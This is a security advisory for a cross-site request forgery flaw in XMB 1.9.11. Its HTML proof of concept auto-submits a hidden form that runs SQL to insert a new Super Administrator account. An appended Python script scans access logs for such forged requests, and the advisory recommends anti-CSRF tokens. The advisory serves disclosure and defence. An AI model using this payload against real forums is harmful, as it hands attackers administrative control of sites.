XMB 1.9.11 Cross Site Request Forgery

17 Sep 2010 | Reported by AutoSec Tools | Type: packetstorm | Source: packetstormsecurity.com

XMB 1.9.11 Cross-site Request Forgery allows arbitrary SQL execution

```html
<!------------------------------------------------------------------------
# Software................XMB 1.9.11
# Vulnerability...........Cross-site Request Forgery
# Download................http://www.xmbforum.com/
# Release Date............9/16/2010
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................John Leitch
# Site....................http://www.johnleitch.net/
# [email protected]
# ------------------------------------------------------------------------
#
# --Description--
#
# A cross-site request forgery vulnerability in XMB 1.9.11 can be
# exploited to execute arbitrary SQL.
#
#
# --PoC-->

<html>
<body onload="document.forms[0].submit()">
<form method="POST" action="http://localhost/xmb/cp.php?action=upgrade">
<input type="hidden" name="upgrade" value="INSERT INTO xmb_members (username, password, status) VALUES ('new_admin', md5('Password1'), 'Super Administrator')" />
<input type="hidden" name="upgradesubmit" value="Submit Changes" />
</form>
</body>
</html>
```
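
The PoC auto-submits a form from a third-party page to `cp.php?action=upgrade`, so the resulting POST reaches the forum with a foreign or absent `Referer`. The following added example (not part of the original advisory or of XMB) scans combined-format access logs for that pattern; the host `forum.example`, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache/nginx "combined" access-log format (assumed; adjust for your server).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" \d{3} \S+ '
    r'"(?P<referer>[^"]*)" "[^"]*"$'
)

def is_upgrade_request(target):
    """True for the control-panel action the PoC form posts to."""
    parts = urlsplit(target)
    return (parts.path.endswith("/cp.php")
            and "upgrade" in parse_qs(parts.query).get("action", []))

def classify_referer(referer, trusted_hosts):
    """Return a reason string when the Referer is not the forum itself."""
    if referer in ("", "-"):
        return "missing-referer"  # lower confidence: browsers may strip it
    host = (urlsplit(referer).hostname or "").lower()
    return None if host in trusted_hosts else "cross-origin-referer"

def find_suspect_upgrades(lines, trusted_hosts):
    """Return (line_no, client_ip, reason, referer) for suspicious POSTs."""
    trusted = {h.lower() for h in trusted_hosts}
    findings = []
    for n, line in enumerate(lines, 1):
        m = LINE_RE.match(line.strip())
        if not m or m["method"] != "POST" or not is_upgrade_request(m["path"]):
            continue
        reason = classify_referer(m["referer"], trusted)
        if reason:
            findings.append((n, m["ip"], reason, m["referer"]))
    return findings

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '203.0.113.10 - - [17/Sep/2010:10:00:01 +0000] "POST /xmb/cp.php?action=upgrade HTTP/1.1" 200 5120 "http://forum.example/xmb/cp.php?action=upgrade" "Mozilla/5.0"',
    '203.0.113.10 - - [17/Sep/2010:10:05:42 +0000] "POST /xmb/cp.php?action=upgrade HTTP/1.1" 200 5120 "http://other.example/page.html" "Mozilla/5.0"',
    '203.0.113.10 - - [17/Sep/2010:10:06:10 +0000] "POST /xmb/cp.php?action=upgrade HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [17/Sep/2010:10:07:00 +0000] "GET /xmb/index.php HTTP/1.1" 200 900 "http://other.example/" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in find_suspect_upgrades(SAMPLE_LOG, ["forum.example"]):
        print(finding)
```

A hit is a lead for review, not proof of compromise; the durable fix is a per-session anti-CSRF token checked on every state-changing control-panel request.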
